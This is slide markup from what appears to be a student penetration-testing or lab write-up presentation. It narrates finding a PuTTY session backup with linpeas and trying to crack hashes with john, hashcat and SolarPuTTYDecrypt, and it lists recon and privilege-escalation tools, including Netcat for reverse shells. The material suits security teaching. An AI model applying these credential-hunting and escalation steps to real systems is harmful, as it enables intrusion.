          </a:p>
          <a:p>
            <a:pPr marL="0" marR="0" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="800"/>
              </a:spcAft>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2400" b="1" kern="100" dirty="0">
                <a:effectLst/>
                <a:latin typeface="Aptos" panose="020B0004020202020204" pitchFamily="34" charset="0"/>
                <a:ea typeface="Aptos" panose="020B0004020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>It gave me a lot of information but nothing worked so far, like a hash for the admin password but I couldn't crack it by anything.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2400" b="1" kern="100" dirty="0">
                <a:effectLst/>
                <a:latin typeface="Aptos" panose="020B0004020202020204" pitchFamily="34" charset="0"/>
                <a:ea typeface="Aptos" panose="020B0004020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>As shown in the figure above, a database dump was shown but the password hash was a dead end.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" sz="2400" b="1" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="261860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2960D7E6-2E41-91F2-4BD5-B93EEC17D29B}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3189515" y="4049408"/>
            <a:ext cx="3981854" cy="2216513"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="en-US" sz="4000" b="1" dirty="0"/>
              <a:t>Mohamed Wael</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="4000" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="14" name="Arc 1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descr="A blue rectangle with white text&#10;&#10;Description automatically generated">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{736C2754-B789-DEC3-2131-7D484EB29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850" y="704504"/>
            <a:ext cx="8960435" cy="334490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Tree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="210998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6A1FF8-B2AD-024C-0537-A2095E18794F}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="630936" y="640080"/>
            <a:ext cx="4818888" cy="1481328"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchor="b">
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr lang="en-US" sz="540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AB8A5C-A229-2FEF-58B5-DD9B866EF133}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="630936" y="2660904"/>
            <a:ext cx="4818888" cy="3547872"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchor="t">
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2000" kern="100" dirty="0">
                <a:effectLst/>
                <a:latin typeface="Aptos" panose="020B0004020202020204" pitchFamily="34" charset="0"/>
                <a:ea typeface="Aptos" panose="020B0004020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>All </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" kern="100" dirty="0" err="1">
                <a:effectLst/>
                <a:latin typeface="Aptos" panose="020B0004020202020204" pitchFamily="34" charset="0"/>
                <a:ea typeface="Aptos" panose="020B0004020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>linpeas</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" kern="100" dirty="0">
                <a:effectLst/>
                <a:latin typeface="Aptos" panose="020B0004020202020204" pitchFamily="34" charset="0"/>
                <a:ea typeface="Aptos" panose="020B0004020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t> report was a dead end except the backup folders section that told me there is a backup in two places which are the opt and var directories.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2000" kern="100" dirty="0">
                <a:effectLst/>
                <a:latin typeface="Aptos" panose="020B0004020202020204" pitchFamily="34" charset="0"/>
                <a:ea typeface="Aptos" panose="020B0004020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>I visited the two directories and found a putty sessions backup file in the opt directory.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2000" kern="100" dirty="0">
                <a:effectLst/>
                <a:latin typeface="Aptos" panose="020B0004020202020204" pitchFamily="34" charset="0"/>
                <a:ea typeface="Aptos" panose="020B0004020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>The putty tool is used for ssh connections and file transferring so it might be important backup file.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" sz="2000" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="4" name="Picture 3" descr="A screenshot of a computer screen&#10;&#10;Description automatically generated">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{55E13434-BF9C-41DB-A0BC-C5AE0DC1FD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048" y="1129410"/>
            <a:ext cx="5458968" cy="4599180"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="39884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E3ADCBE7-9330-1CDA-00EB-CDD12DB722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90"/>
            <a:ext cx="12192000" cy="1733407"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:ln>
            <a:noFill/>
          </a:ln>
          <a:effectLst>
            <a:outerShdw blurRad="254000" dist="381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DC82A-3384-EF6D-BA0D-CDC8D3035C4B}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="761802" y="240241"/>
            <a:ext cx="10760054" cy="1228299"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr lang="en-US" sz="4000"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{8F6FFFF1-C48A-56AA-FE16-B4CB39705328}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="761802" y="2321476"/>
            <a:ext cx="4864875" cy="3850724"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchor="ctr">
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2000" kern="100">
                <a:effectLst/>
                <a:latin typeface="Aptos" panose="020B0004020202020204" pitchFamily="34" charset="0"/>
                <a:ea typeface="Aptos" panose="020B0004020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>The putty tool is used for ssh connections and file transferring so it might be important backup file.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" marR="0" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="800"/>
              </a:spcAft>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000" kern="100">
                <a:effectLst/>
                <a:latin typeface="Aptos" panose="020B0004020202020204" pitchFamily="34" charset="0"/>
                <a:ea typeface="Aptos" panose="020B0004020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>I tried to crack the hash by several tools like john the ripper and hashcat and crackstation website but couldn't and struggled a bit in this hash.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" marR="0" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="800"/>
              </a:spcAft>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000" kern="100">
                <a:effectLst/>
                <a:latin typeface="Aptos" panose="020B0004020202020204" pitchFamily="34" charset="0"/>
                <a:ea typeface="Aptos" panose="020B0004020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>After searching for a bit I found a tool made specially for cracking PuTTy hashes called SolarPuTTyDecrypt so I installed it and tried to crack the given hash.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" sz="2000"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="4" name="Picture 3">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{50EE6682-D442-1231-12FA-C146878B28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8479" y="3007424"/>
            <a:ext cx="5178206" cy="1286134"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="71648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hand holding a magnifying glass over a computer screen&#10;&#10;Description automatically generated">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{6F6996F7-AA5A-B759-30BE-A0C1EDA2B2AA}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId2">
            <a:duotone>
              <a:prstClr val="black"/>
              <a:schemeClr val="bg1">
                <a:tint val="45000"/>
                <a:satMod val="400000"/>
              </a:schemeClr>
            </a:duotone>
            <a:alphaModFix amt="25000"/>
            <a:extLst>
              <a:ext uri="{28A0092B-C50C-407E-A947-70E740481C1C}">
                <a14:useLocalDpi xmlns:a14="http://schemas.microsoft.com/office/drawing/2010/main" val="0"/>
              </a:ext>
            </a:extLst>
          </a:blip>
          <a:srcRect r="246" b="-1"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="782674" y="29548"/>
            <a:ext cx="10691270" cy="6013845"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2" name="Title 1">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{C7E3F886-2FCF-CCB4-7B35-BB66D367C8D0}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="ctrTitle"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2552152" y="492452"/>
            <a:ext cx="7315200" cy="1010837"/>
          </a:xfrm>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchor="b">
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="4800" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Passive Reconnaissance"</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Subtitle 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{0E809CE2-8DB4-BC36-E6C2-BEA8C219DF38}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="subTitle" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="782671" y="1503290"/>
            <a:ext cx="9150703" cy="4892444"/>
          </a:xfrm>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchor="t">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="l"/>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Tools </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="l"/>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>WHOIS Lookup: Domain ownership details, Registrar information</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="l"/>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>whois.domaintools.com </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="l"/>
            <a:endParaRPr lang="en-US" b="1" dirty="0">
              <a:solidFill>
                <a:schemeClr val="bg1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr algn="l"/>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>DNS Enumeration :DNS records, Subdomains</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="l"/>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>DNSDumpster</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" b="1" dirty="0">
              <a:solidFill>
                <a:schemeClr val="bg1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr algn="l"/>
            <a:endParaRPr lang="en-US" b="1" dirty="0">
              <a:solidFill>
                <a:schemeClr val="bg1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr algn="l"/>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Search Engine Recon (Google Dorking)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="l"/>
            <a:endParaRPr lang="en-US" b="1" dirty="0">
              <a:solidFill>
                <a:schemeClr val="bg1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr algn="l"/>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Email Harvesting  : </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>theHarvester</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" b="1" dirty="0">
              <a:solidFill>
                <a:schemeClr val="bg1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="242199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A screen shot of a computer&#10;&#10;Description automatically generated">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{BA4D0F46-F278-B52B-98A2-9928BCAEACF3}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId2"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="659914" y="1242685"/>
            <a:ext cx="10872172" cy="188110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FEB1262-0B41-86C5-B015-4AE984AE3B3E}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="268205" y="3780317"/>
            <a:ext cx="9427337" cy="2216512"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" kern="100" dirty="0">
                <a:effectLst/>
                <a:latin typeface="Aptos" panose="020B0004020202020204" pitchFamily="34" charset="0"/>
                <a:ea typeface="Aptos" panose="020B0004020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>But the tool requires a password to be given to try cracking the hash with it.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="14631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D7178A-CABE-DFCE-B1B8-6D50CA71B96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467B8A4-12B0-5231-EF75-FB9C0280D85E}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="838200" y="1641752"/>
            <a:ext cx="5257800" cy="1323439"/>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kern="1200" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="+mj-lt"/>
                <a:ea typeface="+mj-ea"/>
                <a:cs typeface="+mj-cs"/>
              </a:rPr>
              <a:t>Privilege Escalation</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="Subtitle 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{12BAFBA1-9A25-A96E-DA03-637C753B2883}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="835023" y="2869003"/>
            <a:ext cx="4978495" cy="2454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err="1">
                <a:solidFill>
                  <a:schemeClr val="bg1">
                    <a:alpha val="80000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
              <a:t>Netcat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1">
                    <a:alpha val="80000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
              <a:t> – Banner Grabbing , Reverse Shell</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="bg1">
                    <a:alpha val="80000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
              <a:t>LinEnum</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" b="1" dirty="0">
              <a:solidFill>
                <a:schemeClr val="bg1">
                  <a:alpha val="80000"/>
                </a:schemeClr>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="bg1">
                    <a:alpha val="80000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
              <a:t>PrivescCheck</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" b="1" dirty="0">
              <a:solidFill>
                <a:schemeClr val="bg1">
                  <a:alpha val="80000"/>
                </a:schemeClr>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" b="1" dirty="0">
              <a:solidFill>
                <a:schemeClr val="bg1">
                  <a:alpha val="80000"/>
                </a:schemeClr>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="14" name="Group 13">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5" name="Group 14">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9" name="Freeform: Shape 18">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6" name="Group 15">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7" name="Freeform: Shape 16">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7" name="Picture 6" descr="A person sitting at a desk with a computer&#10;&#10;Description automatically generated">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{C5A0A532-F93D-0F2B-78CE-3C50FE1EC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1932" y="1410132"/>
            <a:ext cx="4369112" cy="2944749"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="8" name="Title 1">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{89319B0D-0FDF-6590-C259-FD7A97C905AD}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="693782" y="5487225"/>
            <a:ext cx="5260975" cy="6939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Nourhan Ayman</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="427144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1000"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="5">
                                            <p:txEl>
                                              <p:pRg st="0" end="0"/>
                                            </p:txEl>
                                          </p:spTgt>
                                        </p:tgtEl>
                                      </p:cBhvr>
                                    </p:animEffect>
                                    <p:anim calcmode="lin" valueType="num">
                                      <p:cBhvr>
                                        <p:cTn id="2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fade">
                                      <p:cBhvr>
                                        <p:cTn id="29" dur="1000"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="5">
                                            <p:txEl>
                                              <p:pRg st="1" end="1"/>
                                            </p:txEl>
                                          </p:spTgt>
                                        </p:tgtEl>
                                      </p:cBhvr>
                                    </p:animEffect>
                                    <p:anim calcmode="lin" valueType="num">
                                      <p:cBhvr>
                                        <p:cTn id="3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animEffect transition="in" filter="fade">
                                      <p:cBhvr>
                                        <p:cTn id="34" dur="1000"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="5">
                                            <p:txEl>
                                              <p:pRg st="2" end="2"/>
                                            </p:txEl>
                                          </p:spTgt>
                                        </p:tgtEl>
                                      </p:cBhvr>
                                    </p:animEffect>
                                    <p:anim calcmode="lin" valueType="num">
                                      <p:cBhvr>
                                        <p:cTn id="3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EB085C1-D0DE-D2CB-D70F-25F89ACD66A7}"/>
            </a:ext>
          </a:extLst>
        </p:cNvPr>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="11" name="Picture 10" descr="A close up of a blue and black book&#10;&#10;Description automatically generated">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{6C182B18-121E-42AB-1971-398CDF0FB9A0}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId2"/>
          <a:srcRect b="25000"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="20" y="10"/>
            <a:ext cx="12191980" cy="6857990"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="15" name="Rectangle 1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434589C0-42E4-BEDE-212E-A05D788DF2B3}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="838200" y="365125"/>
            <a:ext cx="10515600" cy="1325563"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Banner Grabbing ( during enumeration )</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:graphicFrame>
        <p:nvGraphicFramePr>
          <p:cNvPr id="9" name="Content Placeholder 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{645E4335-8F20-0490-BA9E-B0E8E1735625}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
